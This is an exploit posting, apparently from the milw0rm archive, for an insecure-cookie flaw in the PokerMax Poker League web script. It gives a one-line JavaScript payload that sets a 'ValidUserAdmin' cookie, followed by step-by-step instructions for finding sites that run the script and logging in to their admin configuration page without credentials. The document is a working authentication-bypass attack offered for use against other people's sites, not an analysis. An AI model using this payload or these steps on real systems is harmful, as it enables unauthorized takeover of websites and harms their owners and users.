45 lines
No EOL
1.4 KiB
Text
45 lines
No EOL
1.4 KiB
Text
**************************************************************************************
|
|
|
|
Author : DaRkLiFe
|
|
Greetz : str0ke & S.W.A.T. & funkys0ul
|
|
|
|
**************************************************************************************
|
|
Script :
|
|
|
|
PokerMax Poker League Insecure Cookie Handling Vulnerability
|
|
|
|
Download:
|
|
|
|
http://www.stevedawson.com/downloads/pokerleague.zip
|
|
**************************************************************************************
|
|
|
|
Exploit :
|
|
|
|
javascript:document.cookie = "ValidUserAdmin=admin";
|
|
|
|
**here "admin" refers to username of administrator on site
|
|
|
|
default username is "admin" given after installation of site
|
|
|
|
but if it is changed u can easily find out username of admin and then
|
|
substitute it in place of "admin"
|
|
**************************************************************************************
|
|
|
|
Instructions :
|
|
|
|
Find the site running on this script .
|
|
|
|
Go to http://site.com/pokerleague/pokeradmin/configure.php
|
|
|
|
It will ask for login. Now in url tab run the exploit command
|
|
|
|
Then return back to http://site.com/pokerleague/pokeradmin/configure.php
|
|
|
|
Now u should be loggedin as admin and change the thing into what you want .
|
|
|
|
**************************************************************************************
|
|
|
|
THANKS ! GREETZ ! HAPPY DIWALI !
|
|
**************************************************************************************
|
|
|
|
# milw0rm.com [2008-10-16] |